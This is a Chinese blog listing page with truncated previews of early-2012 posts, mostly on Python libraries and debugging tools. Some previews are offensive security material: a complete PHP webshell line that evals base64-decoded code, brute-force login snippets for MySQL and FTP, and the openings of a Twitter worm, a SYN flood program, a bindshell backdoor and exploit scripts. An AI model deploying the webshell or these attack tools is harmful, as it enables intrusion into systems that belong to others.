- 博客(49)
- 资源 (22)
- 收藏
- 关注
原创 用于溢出漏洞研究的Socket服务端程序
配合该echo服务端程序,以及反调试工具(代码见我另外的帖子http://blog.csdn.net/yatere/article/details/7307266),可以研究下远程漏洞开发和shellcode的原理。可以用nc或者下面py脚本来测试这个echo服务器,使用调试工具监控服务器端异常。import socketmys=socket.socket()mys.con
2012-02-29 21:22:50 1184
原创 python 软件漏斗挖掘脚本
排版有问题,修改了以下。官网无法下载。把这个作为摸班了把from pydbg import *from pydbg.defines import *import utils# This is the maximum number of instructions we will log# after an access violation MAX_INSTRUCTI
2012-02-29 18:36:31 1604
原创 灰帽子里面的pydbg代码
这里除了代码,也放上几个自己写的有漏洞的exe程序方便大家调试,有漏洞的exe程序在:http://howfile.com/file/2611e8a1/8c414bff/程序功能只是每隔一秒标题数字加1,有了快照,那么数字可以还原到快照时刻代码如下,注意修改程序路径,这里的程序是压缩包的 “快照测试.exe”from pydbg import *from
2012-02-29 16:21:28 1254
原创 关于pydbg的一些代码
pydbg 可以做好多事情,这里我把自己常用的一些代码写上来;方便找到进程并加载findpid=Trueprint "Finding ...\n"while findpid: for i in dbg.enumerate_processes(): if i[1]=='stark.exe': dbg.attach(i[0])
2012-02-29 15:17:00 1478
原创 python 的 argparse模块
以前总是只用argv[1]之类的作为参数,这次看到一个题,基本上要用它了add_argument:读入命令行参数,该调用有多个参数ArgumentParser.add_argument(name or flags…[, action][, nargs][, const][, default][, type][, choices][, required][, help][,
2012-02-28 22:21:36 13893
转载 某一IT公司要求的python面试题
题目:使用python编写一个网站爬虫程序,支持参数如下:spider.py -u url -d deep -f logfile -l loglevel(1-5) --testself -thread number --dbfile filepath --key=”HTML5” 参数说明:-u 指定爬虫开始地址-d 指定爬虫深度--thread 指定线程池大小,多
2012-02-28 18:20:20 3316 2
原创 windbg paimei immdbg py2.7 win2003的虚拟机
有个家伙在群里面发了最新的py2.6安装方法,好复杂,网上10个相关帖子9个也都是如何如何复杂复杂的安装配置环境的,至少我一个没看见是讲如何在py2.7下的,而且也是不带guicon的。回想我当时几个小时就搞定了,不得不发帖一说,还准备上传vm镜像,请各位留意其实配置方法也很简单:直接去http://www.lfd.uci.edu/~gohlke/pythonlib
2012-02-27 22:04:57 1191
原创 socketserver 模块异步http服务器代码.
例子也好,在线文档也好,都没有说异步的http代码。其实现有函数早以实现。参考下面代码。import http.serverimport socketserverPORT = 80Handler = http.server.SimpleHTTPRequestHandlerhttpd = socketserver.ThreadingTCPServer(("", PORT), Handler)
2012-02-23 23:16:35 1021
原创 让你的python输出彩色字体 支持 py3
这个模块是:termcolor 1.1.0代码如下import sysfrom termcolor import colored, cprinttext = colored('Hello, World!', 'red', attrs=['reverse', 'blink'])print(text)cprint('Hello, World!', 'green', 'on
2012-02-22 10:28:01 3249
原创 PyQt4 简单使用说明 py3.2
1.PyQt4的下载安装这个过程比较简单,注意与自己安装的python版本一致,我下载的版本为PyQt-Py3.2-x86-gpl-4.8.6-1.exe下载页面:http://www.riverbankcomputing.co.uk/software/pyqt/download安装完成后,写个简单的测试程序import sysfrom PyQt4 impor
2012-02-19 03:44:45 1223
原创 一个用于踩点获取信息的python脚本
哎,总算是可以满足要求了。实例化对象之后,直接就可以获得对象的 ip whois信息 dns whois信息。主机头信息等等。#coding='utf8'import httplib2,socket,sys,reimport urllib.parse as upfrom pprint import pprint#for com,net后缀的域名#s.co
2012-02-15 17:44:19 1209
转载 Python tools for penetration testers
NetworkScapy: send, sniff and dissect and forge network packets. Usable interactively or as a librarypypcap, Pcapy and pylibpcap: several different Python bindings for libpcaplibdnet: low-level
2012-02-14 19:02:10 1009 1
原创 httplib2 支持使用例子(python3支持)
个人觉得非常不错,就是对cookie支持存在问题,对代理服务器支持上也有问题Simple Retrievalimport httplib2 h = httplib2.Http(".cache") resp, content = h.request("http://example.org/", "GET")The 'content' is the content
2012-02-13 17:49:33 4126
原创 早期的Twitte蠕虫
function XHConn(){ //创建XMLHttpRequest对象 var xmlhttp, bComplete = false; //由于 Internet Explorer 浏览器使用 MSXML 解析器处理 XML,而且MSXML 实际上有两种不同的版本,因此采用以下两种方式创建对象 try { xmlhttp = new ActiveXObject("Msxm
2012-02-13 14:38:44 805
原创 基于python的使用验证码识别技术(py3 可用)
以下技术配合python特有的web 相关处理能力可以再很多方面实施自动化功能了。from PIL import Imageimage_name=r'c:\no2.jpg' #现实中可以直接用urllib.request.urlopen()或者urllib.request.urlretrieve()函数等方式获得。#以下内容需要实际图片分析得出sx=20 #起始xsy=1
2012-02-11 02:40:54 2792 4
转载 PIL python的一个图像处理库 支持 python3
1 影像與圖形資料的處理上一回我們談過了圖形介面程式的撰寫,這一次我們要討論圖形 (影像) 本身的處理,而討論的內容將會集中在 Python Imaging Library (PIL) 這一套程式庫上。PIL 是 Python 下最有名的影像處理套件,由許多不同的模組所組成,並且提供了許多的處理功能,允許我們在簡單的 Python 程式裡進行影像的處理。使用像 PIL 許樣的程式庫套件
2012-02-10 23:46:26 2348 1
原创 一个python 3.2下的 高级 电子邮件库 pyzmail
pyzmail 模块是支持py3的非常好的一个邮件模块,支持邮件的解析创建和发送等炒作。比起默认的smtplib和mime等模块简单多了。下面是一个例子,因为这个模块对于发送邮件有点小问题,我这里仅仅是用它创建eml文件,还是用smtolib去发了。模块地址:http://www.magiksys.net/pyzmail/#coding='utf8'import pyzmail,smtplib
2012-02-09 22:06:07 4154
原创 python3 下的一个模糊化测试模块
Fusil is a Python library used to write fuzzing programs. It helps to start process with a prepared environment (limit memory, environment variables, redirect stdout, etc.), start network client or
2012-02-09 21:49:34 764
原创 python 执行javascript 模块 支持 python3
http://pypi.python.org/pypi/PyExecJS/1.0.2一个解析javascript的模块,虽然支持python3,但是支持的python3支持的引擎貌似有问题啊。v8是直支持py2.7哎,暂时空架而已PyExecJS 1.0.2Run JavaScript code from PythonDownload
2012-02-09 21:37:37 16173 1
原创 Http协议python优秀库 urllib3 (支持python3)
按照官方意思,这个模块最大的特点就是:支持403转向支持数据压缩支持客户端证书说是非常适合抓站。文档地址:http://urllib3.readthedocs.org/en/latest/index.htmlhttp://code.google.com/p/urllib3/ 先列出使用方法:# coding=u
2012-02-09 19:41:51 3362
原创 Python使用struct处理二进制
有的时候需要用python处理二进制数据,比如,存取文件,socket操作时.这时候,可以使用python的struct模块来完成.可以用 struct来处理c语言中的结构体.有的时候需要用python处理二进制数据,比如,存取文件,socket操作时.这时候,可以使用python的struct模块来完成.可以用 struct来处理c语言中的结构体. struct模
2012-02-08 15:26:34 1086
原创 beautifulsoup 4来了,支持python3.x
下载地址:本月3日才更新,第一时间放出!http://www.crummy.com/software/BeautifulSoup/bs4/download/4.0/记住:使用时候应该使用from bs4 import BeautifulSoup初始化:from bs4 import BeautifulSoup as bsres=ur.u
2012-02-08 01:51:16 2558
转载 用Python实现Spy++
Spy++是微软出品的用来获取Window窗口信息的一个小工具。实现的原理其实不难,通过调用某些特定的Windows API即可。于是,我打算用Python也实现一个功能简化版本的小工具,取名叫PySpy++。Python中调用Windows API一般使用pywin32这套库,界面库我使用PyQT4。Spy++原理Spy++中,最常用的一个功能,就是识别窗口。其中主要需要用到
2012-02-07 21:42:24 3234
原创 用python代替javascript编写基于浏览器的应用
如果能用python代替Javascript编写基于浏览器的应用,该有多好啊。但是,Javascript是唯一一种能在浏览器里执行的语言(Flash或Silverlight除外)。换个思路,先用Python编写代码,然后在通过编译器转为为Javascript脚本,这样确实是可行的。嗯,已经有人这么干了,就是这个:PyjamasPyjamas的介绍:Google 的 Web
2012-02-07 21:39:48 2370
转载 Python操作IHTMLDocument2用于自动化测试
有些软件的界面采用Win32窗口嵌套一个IE控件,用Spy++只能识别出一个Internet Explorer_Server控件。常用的几个API函数无法取到IE控件里面的内容,更无法对里面的控件进行操作,所以这给自动化带来了麻烦。本文将讲述如何使用Python获取IHTMLDocument2接口,用于自动化测试。获取IHTMLDocument2接口参考:http://suppor
2012-02-07 21:38:00 1170
转载 python调用有事件发生的com时,需要一些技巧。
我们以ie这个com为例来讲解一下我的经验。 首先我们需要pywin32这个模块的支持,它提供了我们调用com便利直接方法。你可以www.sf.net搜索并下载它。 先运行如下代码:import win32guiimport win32comimport win32com.clientimport pythoncomimport time cla
2012-02-07 21:34:56 2624
原创 python 常见破解代码简单演示(不断增加)
mysql:import MySQLdb as mysqlpwd='1234'try: mysql.connect("127.0.0.1","root",pwd) print("密码正确")except Exception as yk: print("密码错误") ftp:import ftplib as ftppwd=
2012-02-07 17:13:34 977
转载 Python生成随机数
import randomimport string#随机整数:print random.randint(1,50)#随机选取0到100间的偶数:print random.randrange(0, 101, 2)#随机浮点数:print random.random()print random.uniform(1, 10)#随机
2012-02-07 16:55:01 963
转载 PDF Viewer Component ActiveX DoS
Title : PDF Viewer Component ActiveX DoSAuther : Senator of PiratesE-Mail : Senator.of.Pirates.team@gmail.comFaceBook : FaceBook.Com/SenatorofPiratesSoftware link : http://www.ocxt.com/downloa
2012-02-07 14:09:19 831
原创 80sec里面的小马
session_start();$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');黑客果然是为了ev
2012-02-07 12:16:20 956
转载 MS11-046
/* * 触发MS11-046 * 来源:azy,http://hi.baidu.com/azy0922/blog/item/053065d197cebfca572c8492.html * 改编:KiDebug,Google@pku.edu.cn * 编译:VC6.0 * 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户 */#include
2012-02-06 22:08:57 1119
转载 PHP Fuzzing行动——源码审计
作者:Shahin Ramezany译者:riusksk(泉哥:http://riusksk.blogbus.com) 目录:Section 1:20种PHP源码快速审计方式 Section 2:PHP源码审计自动化( PHP Fuzzer ) 风险级别:■ Low■ Medium■ High 在开始PHP代码分析之前,读者必
2012-02-06 20:27:44 4261
转载 python调用win32下的API__&&__Win32Com__[转]使用 python 写 COM
http://hi.baidu.com/netspider_2007http://hi.baidu.com/netspider_2007/blog/item/8b6ef35948d99a89810a1838.htmlhttp://hi.baidu.com/sinomazing/blog/item/611b85160d24f710972b43e1.htmlhttp://code.acti
2012-02-06 15:37:12 7236
转载 Microsoft Office 2003 Home/Pro 0day
#!/usr/bin/python## Note from the Exploit-DB team: This might be the same bug as:# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragm
2012-02-06 15:24:11 1282
转载 python 取出当前时间详解 time
取得时间相关的信息的话,要用到python time模块,python time模块里面有很多非常好用的功能,你可以去官方文档了解下,要取的当前时间的话,要取得当前时间的时间戳,时间戳好像是1970年到现在时间相隔的时间。你可以试下下面的方式来取得当前时间的时间戳:import timeprint time.time()输出的结果是:1279578704.6725271
2012-02-06 13:02:36 814
原创 PIL库for 3.2说明
一定不能和版本2一样。要:python3 :from PIL import Imagepython2: import Image现在python3的功能越来越多了,可以用这个库做验证码识别了。
2012-02-05 23:50:19 610
转载 synflood.c 的一个例子
#include #include #include #include #pragma comment(lib,"ws2_32")#pragma comment(lib,"wsock32")#define FAKE_IP "201.79.131.18" #define SEQ 0x28376839#define right "===============Coder Paris
2012-02-05 16:52:35 781
转载 一个bindshell的代码
/* * Win32 RootKit - cmd.exe remote shell backdoor * (c) 2003 Christophe Devine * Distributed for educational purposes only! * * Before running ntbindshell.exe, rename it to * "rsmss.exe" and c
2012-02-05 16:48:06 1131
转载 演示还原NT平台上拨号连接的密码
-=-=-=-=-=-=-=-=-=-= x_dialupass.c -=-=-=-=-=-=-=-=-=-=/*演示还原NT平台上拨号连接的密码可运行于windows 2000/xp/2003原理基于分析dialupass v2.42eyas at xfocus.orghttp://www.xfocus.net2004-10-01FileName: x_dialupas
2012-02-05 16:45:33 889
hydra 7.2 win32
2012-04-09
用Python做科学计算
2012-04-04
pyloris-3.2-win32
2012-03-17
类似IE的VC编写浏览器
2012-01-28
Using_XSS_to_bypass_CSRF_protection
2012-01-28
C语言难点及分析.
2012-01-28
向其他进程注入代码的三种方法
2012-01-28
网站安全漏洞的产生分析、处理总结
2011-04-21
VC学习大纲 VC学习讲义
2009-06-09
The Analysis Of Basic MFC Program Running Principle
2008-12-29
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人